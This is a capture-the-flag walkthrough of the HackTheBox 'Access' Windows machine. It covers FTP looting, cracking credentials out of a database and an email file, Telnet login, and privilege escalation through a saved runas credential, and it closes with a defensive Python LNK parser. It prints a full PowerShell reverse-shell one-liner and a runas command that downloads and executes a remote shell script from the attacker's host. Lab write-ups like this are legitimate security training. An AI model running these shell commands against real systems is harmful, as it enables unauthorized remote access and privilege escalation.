Access - HackTheBox Writeup


The link for this machine is located here: https://app.hackthebox.com/machines/156


This room contains FTP and web enumeration. From there, we find a database file and enumerate it, gaining a shell. Finally, some priv esc techniques are also discussed including some juicy PowerShell.


Full Walkthrough

First thing we can do is scan the machine with the following parameters:

  • -p- for all ports

  • 10.10.10.98 for the target

  • -oN allports.scan to output to a file

This returns 3 ports open - FTP, Telnet and HTTP. To gather more information about these services, we can run a more detailed Nmap scan.

Not a lot of information is returned to us, but there is some useful information such as anonymous FTP login being allowed and Microsoft IIS 7.5 running on port 80.

A good first step is to check out the website running on the target.

Here, it looks like a live feed of some sort of server room. We can check the source code for anything potentially interesting.

There is nothing in the source code, but it does tell us that it is not an actual live feed, but rather a simple JPG image.

From here, we can try and run a tool like Feroxbuster on the website to try and find hidden directories.

Unfortunately, it finds nothing. As of right now, the website is a dead end.

Knowing this, we can try a different service - such as FTP with the anonymous login.

It works and we can access the FTP share. Listing out the contents reveals two directories - Backups and Engineer.

Accessing the Backups directory, we see a “backup.mdb” file.

To download it, we can first set the FTP mode to binary and then use the “get” command to get a local copy of the file.

Then, we can navigate into the Engineer folder and see a ZIP file titled “Access Control.zip”.

Once again, we can use the get command to download the ZIP.

From here, we should have two files downloaded from FTP - Access Control.zip and backup.mdb.

First, we can identify what type of file the backup.mdb is using the simple “file” command on Linux.

This reveals it to be a Microsoft Access Database. On Linux, we can use a tool called “mdb-tables” to list out the tables inside this database.

This lists out a ton of different tables. We can check a few and see what hides inside them using the “mdb-export” command, giving it the database and the table we want to look at.

As we can see, these tables have columns. However, we don’t know if these tables actually include data or are just empty.

To find out in a quick and efficient way, we can write a BASH one-liner that prints out which tables actually have data contained inside them. The BASH one-liner is as follows:

mdb-tables backup.mdb | tr ' ' '\n' | grep . | while read table; do lines=$(mdb-export backup.mdb "$table" | wc -l); if [ "$lines" -gt 1 ]; then echo "$table: $lines"; fi; done

As we can see, this reveals the tables that actually contain data inside them. Looking more closely, there is one that stands out as interesting - auth_user.

Knowing it contains data, we can take a deeper look at it using mdb-export once again.

Here, we get some potential credentials for admin, engineer and backup_admin - take note of these for now:

  • admin:admin

  • engineer:access4u@security

  • backup_admin:admin

Next, we can move on to analyze the ZIP file by first extracting it using 7z.

Unfortunately, it requires a password - remember those passwords we just found? Trying them out, it seems as though the engineer password (access4u@security) works and can successfully extract this ZIP.

Once extracted, we see it produces a “pst” file. I don’t know what a PST file is, so once again we can analyze it using the file command to see what it is.

It seems to be a simple Outlook email folder. Doing some research, I found a tool called “readpst” that allows us to read this type of file by first converting it to an inbox file.

Once converted, we can open it in any text editor and read the contents.

Bingo! We see an email to “security@accesscontrolsystems.com” saying that the “security” account password has been changed to 4Cc3ssC0ntr0ller.

We now have some new credentials:

  • security:4Cc3ssC0ntr0ller

With these credentials, there is one last port we can try them on - Telnet, which provides the same kind of remote login as SSH but sends everything, credentials included, in the clear.

Telnet will hang for a few seconds after every command, but eventually it provides a login option. Providing the credentials we just found, we gain access to the system.

From here, we can navigate to the Desktop and grab the user flag.

Next, we can enumerate what users are on this system by listing the contents of the C:\Users directory.

We see the Administrator user is the only other user and we cannot navigate to it. From here, the Telnet connection becomes quite annoying, as we have to wait 5-10 seconds after every command is executed.

To speed it up and get a better shell, we can open a PowerShell reverse TCP shell back to our machine.

First, we start a Netcat listener on port 4444.

Then, in our current Telnet session, we execute the massive PowerShell one-liner below:

powershell -command "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.14',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Once run, we get a PowerShell shell on our Netcat listener.

With a more stable and faster shell, we can start enumerating further. A good place to look is inside the Public user’s directory (C:\Users\Public) and just navigate through the different default folders - Documents, Downloads, Videos, etc.

After enumerating, we find a shortcut/link to something called ZKAccess3.5 Security System inside the C:\Users\Public\Documents directory.

From here, we can actually analyze LNK files by utilizing 3 lines inside PowerShell:

$WScript = New-Object -ComObject WScript.Shell   # COM object that can load existing shortcuts
$SC = Get-ChildItem *.lnk                        # the .lnk file in the current directory
$WScript.CreateShortcut($SC)                     # loads it and prints its properties

This will provide some information about the LNK file.

The most important pieces of this information are the Arguments and the TargetPath. Here, we can see that the target path is actually the runas.exe executable and the arguments provided appear to log in automatically with saved credentials for the Administrator and then run Access.exe.

The runas command allows us to run commands as another user, and the /savecred option allows us to use the command without being prompted for a password, reusing one that was previously saved for that account.

As a side note, if you didn’t have PowerShell, you could return most of the same information by using the “type” command on the LNK file - although not as clean an output.

From here, if we are going to execute this runas, we need to check that the Administrator account does not actually require the password, by running the “net user” command.

Password required is set to No. If this were set to Yes, we wouldn’t be able to use runas as Administrator without knowing the password.

From here, we can use this to get another PowerShell shell running as Administrator. To do this, we first copy the Invoke-PowerShellTcp.ps1 script to our local directory.

Then, at the bottom of the file, we add one line that calls the script’s function so that, as soon as the script is loaded, it connects back to us on port 443.

Second to last, we need to start a Python web server in this directory so the target can download this PowerShell script.

Finally, we run the Netcat listener on port 443.

Then, we can execute it by running the following on the target machine:

runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.14/Invoke-PowerShellTcp.ps1')"

And, back on our Netcat listener, we get a juicy new PowerShell session this time running as the Administrator user!

From here, we can simply navigate to the Desktop and grab the root flag.


Extra, Extra, Come Learn a New Technique

Hey you…. don’t you want to learn a cool new trick to analyze LNK files on Linux? Sure you do, it’s fun!

Remembering back to when we analyzed the LNK file using PowerShell - what happens if we don’t have PowerShell or the type command doesn’t work? Well, we can actually exfiltrate the LNK file to a Linux machine and analyze it there.

To do this, we run the certutil command with the -encode parameter and encode the LNK file to a path such as \users\security\appdata\local\temp\output, which produces base64-encoded content for us.

Just to make sure, we can check the contents of our newly created file.

Beautiful. With this, we can simply copy and paste this into a new file on our Linux machine (called lnk.b64) and use base64 -d to decode it to a new file called lnk.

Then from there, we can use a really cool tool called pylnker.py to analyze this LNK file - pretty cool right?
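Both the PowerShell CreateShortcut step earlier in the walkthrough and this certutil/base64 exfiltration step boil down to reading two fields out of a Shell Link file: the target path and the arguments. As an added example (not part of the original writeup, and not pylnker.py), the Python below parses those fields straight from the MS-SHLLINK binary layout on Linux, handles the framing that certutil -encode wraps around the base64, and flags the pattern that made this box exploitable: a shortcut whose target is runas.exe with /savecred in its arguments. The shortcut bytes, the C:\ZKAccessSample paths and the certutil-style framing helper are constructed here for the demo.

```python
"""Parse a Windows .lnk (MS-SHLLINK) file on Linux and flag runas /savecred shortcuts.
Added example: the sample shortcut below is constructed, not taken from the target."""
import base64
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-46}


def _cstr(buf, off):
    """Null-terminated ANSI string starting at buf[off]."""
    return buf[off:buf.index(b"\x00", off)].decode("latin-1")


def parse_lnk(data):
    """Return target, relative_path, working_dir and arguments of a .lnk blob."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 0x4C                                   # end of the fixed 76-byte header
    info = {"target": None, "relative_path": None, "working_dir": None, "arguments": None}
    if flags & HAS_ID_LIST:                      # LinkTargetIDList: u16 size + items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfo carries the local base path
        size, _hdr, li_flags = struct.unpack_from("<III", data, pos)
        lbp_off = struct.unpack_from("<I", data, pos + 16)[0]
        if li_flags & 0x1:                       # VolumeIDAndLocalBasePath present
            info["target"] = _cstr(data, pos + lbp_off)
        pos += size
    # StringData blocks follow in this fixed order, each u16 char count + chars
    for flag, key in ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                      (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                      (HAS_ICON, "icon")):
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + width * count]
        text = raw.decode("utf-16-le") if width == 2 else raw.decode("latin-1")
        pos += width * count
        if key in info:
            info[key] = text
    return info


def uses_saved_credentials(info):
    """True when the shortcut launches runas.exe with /savecred (the pattern on this box)."""
    target = (info.get("target") or info.get("relative_path") or "").lower()
    return target.endswith("runas.exe") and "/savecred" in (info.get("arguments") or "").lower()


def decode_certutil(text):
    """Decode 'certutil -encode' output: drop the BEGIN/END CERTIFICATE framing lines."""
    body = "".join(line.strip() for line in text.splitlines() if not line.startswith("-----"))
    return base64.b64decode(body)


def encode_like_certutil(data):
    """Mimic certutil -encode framing: 64-column base64 between CERTIFICATE lines (constructed)."""
    b64 = base64.b64encode(data).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "-----BEGIN CERTIFICATE-----\r\n" + "\r\n".join(lines) + "\r\n-----END CERTIFICATE-----\r\n"


def build_sample_lnk():
    """Constructed shortcut: runas /user:ACCESS\\Administrator /savecred <app>."""
    local_path = b"C:\\Windows\\System32\\runas.exe\x00"
    volume_id = struct.pack("<IIII", 0x11, 3, 0, 0x10) + b"\x00"  # DRIVE_FIXED, empty label
    hdr = 28
    body = volume_id + local_path + b"\x00"      # VolumeID, LocalBasePath, CommonPathSuffix
    link_info = struct.pack("<IIIIIII", hdr + len(body), hdr, 0x1, hdr, hdr + len(volume_id),
                            0, hdr + len(volume_id) + len(local_path)) + body
    flags = HAS_LINK_INFO | HAS_REL_PATH | HAS_WORK_DIR | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 1, 0, 0, 0, 0)

    def sd(s):                                   # one StringData block, UTF-16LE
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    strings = (sd("..\\..\\..\\Windows\\System32\\runas.exe") + sd("C:\\ZKAccessSample")
               + sd('/user:ACCESS\\Administrator /savecred "C:\\ZKAccessSample\\Access.exe"'))
    return header + link_info + strings


if __name__ == "__main__":
    blob = decode_certutil(encode_like_certutil(build_sample_lnk()))
    info = parse_lnk(blob)
    for key, value in info.items():
        print(f"{key:14}: {value}")
    print("runas /savecred shortcut:", uses_saved_credentials(info))
```

Two things the script makes explicit: certutil -encode wraps its output in BEGIN/END CERTIFICATE lines, so the file has to be stripped of them before base64 -d will accept it; and the field the PowerShell trick prints as TargetPath lives in the LinkInfo block, while the Arguments come from the StringData section, so a shortcut can carry a benign-looking target and still hide /savecred in its arguments. From the defender’s side, a shortcut in a world-readable location such as C:\Users\Public that pairs runas.exe with /savecred is exactly what this check is meant to surface.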

